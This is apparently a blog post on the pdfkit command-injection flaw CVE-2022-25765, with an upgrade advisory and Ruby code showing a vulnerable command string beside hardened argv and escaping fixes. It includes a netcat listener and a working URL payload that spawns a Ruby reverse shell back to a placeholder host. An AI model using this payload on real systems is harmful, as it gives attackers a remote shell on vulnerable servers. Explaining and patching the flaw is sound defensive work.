
CVE-2022-25765 pdfkit

pdfkit-Exploit-Reverse-Shell

All < 0.8.6 versions of this package are vulnerable to command injection because the URL passed to pdfkit is not properly sanitized before it reaches the shell command that invokes wkhtmltopdf.


Severity

Critical 9.8/10

Note

This issue was originally addressed in 0.8.7, but the fix was not complete. A complete fix was released in 0.8.7.2.

Prerequisite setup

HTTP Server
  • python3 -m http.server 9090
Netcat Listener
  • nc -lvnp 4444

Reverse Ruby shell

http://LOCAL-IP:9090/?name=%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("LOCAL-IP",4444))'`

How to fix?

Upgrade pdfkit to version 0.8.7.2 or higher.
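The root cause behind this CVE (a caller-supplied URL spliced into a shell command string) and the shape of a correct fix, as an added Ruby example that is not pdfkit's own code. The function names, the wkhtmltopdf argument list and the sample URLs are constructed for illustration:

```ruby
require "uri"
require "shellwords"
require "open3"

# Characters RFC 3986 permits in a URL (unreserved, reserved, percent-encoding).
# Anything else, e.g. backtick, space, quotes or pipe, is rejected outright.
URL_ALLOWED = %r{\A[A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=%]+\z}

# Validate before the URL goes anywhere near a process launcher.
# The allowlist still admits "$", "(" and ")", which a shell would treat as
# command substitution, so allowlisting alone is not the fix (see argv below).
def safe_url?(url)
  return false unless url.is_a?(String) && url.match?(URL_ALLOWED)
  uri = URI.parse(url)
  %w[http https].include?(uri.scheme) && !uri.host.to_s.empty?
rescue URI::InvalidURIError
  false
end

# The vulnerable shape (constructed, not pdfkit's code): the URL is interpolated
# into one shell string, so any shell metacharacters in it are parsed as shell.
def vulnerable_command_string(url)
  "wkhtmltopdf --quiet #{url} -"
end

# Hardened shape: an argv array. Given several elements, Kernel#spawn and Open3
# exec the binary directly and no shell ever sees the URL.
def wkhtmltopdf_argv(url, output: "-", binary: "wkhtmltopdf")
  raise ArgumentError, "rejected URL: #{url.inspect}" unless safe_url?(url)
  [binary, "--quiet", url, output]
end

# If a shell string is unavoidable, escape every argument instead of interpolating.
def escaped_command_string(url)
  raise ArgumentError, "rejected URL: #{url.inspect}" unless safe_url?(url)
  ["wkhtmltopdf", "--quiet", url, "-"].map { |a| Shellwords.escape(a) }.join(" ")
end

# Render with the argv form; returns [pdf_bytes, stderr, status].
def render_pdf(url)
  Open3.capture3(*wkhtmltopdf_argv(url), binmode: true)
end

if $PROGRAM_NAME == __FILE__
  # Constructed sample inputs: one benign, one carrying a backtick injection.
  ["https://example.com/report?id=42", "http://127.0.0.1:9090/?name=%20`id`"].each do |u|
    puts "#{u.inspect} -> safe_url?=#{safe_url?(u)}"
  end
end
```

The argv form is the important part: the validation rejects the backtick payload shown in this post, but a URL such as `http://example.com/$(id)` is syntactically valid and passes validation, and only the absence of a shell (or `Shellwords.escape` when a shell is unavoidable) keeps it inert.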

Reference

https://nvd.nist.gov/vuln/detail/CVE-2022-25765

https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795

This post is licensed under CC BY 4.0 by the author.
